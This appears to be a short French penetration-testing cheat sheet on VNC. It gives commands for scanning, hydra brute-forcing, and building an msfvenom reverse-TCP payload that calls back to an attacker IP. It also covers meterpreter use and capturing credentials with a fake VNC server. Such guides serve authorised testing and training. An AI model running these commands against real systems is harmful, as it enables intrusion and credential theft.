⌨️VNC - ports 5800,5801,5900,5901
Scan
$ nmap -p 5901 -sV <target IP>
$ nmap -p 5901 --script vnc-info <target IP>
Connexion
$ vncviewer <target IP>:<port>
Bruteforce
$ hydra -s 5901 -P pass.txt -t 16 <target IP> vnc
Attention: Tenter de brute force un service VNC peut entraîner le blocage des comptes
Exploitation
Payload
D'abord il nous faut créer un payload qui nous permettra d'obtenir un reverse shell sur la machine cible.
$ msfvenom -p windows/x64/vncinject/reverse_tcp lhost=<attacker IP> lport=<port d'écoute> -f exe > vnc.exe
Une fois le fichier vnc.exe transféré sur la machine cible, on va ouvrir un multi-handler sur notre machine pour pouvoir recevoir la connexion.
Il ne reste maintenant plus qu'a exécuter vnc.exe sur la machine cible pour recevoir le reverse shell sur notre machine.
Post exploitation
Dans le cas ou on a une session meterpreter sur une machine distante et qu'on peut une session vnc on peut utiliser la commande "run vnc".
meterpreter > run vnc
Capture d'identifiants
Il ressort clairement de la section Exploitation qu'il n'est pas si simple d'obtenir une session VNC sur la machine cible. Cependant, il est possible d'usurper la cible en donnant le mot de passe pour la connexion VNC. Metasploit a un module conçu pour simuler un service VNC qui trompera la cible et obtiendra les informations d'identification. Il nécessite l'adresse IP pour héberger le service et l'emplacement du fichier où les informations d'identification saisies seront stockées.
Si un utilisateur se connecte, on recevra alors un challenge et une réponse.
On peut aussi sniffer ces informations avec wireshark par exemple.
Il nous faudra alors cracker ces identifiants avec vncrack_s.
Dernière mise à jour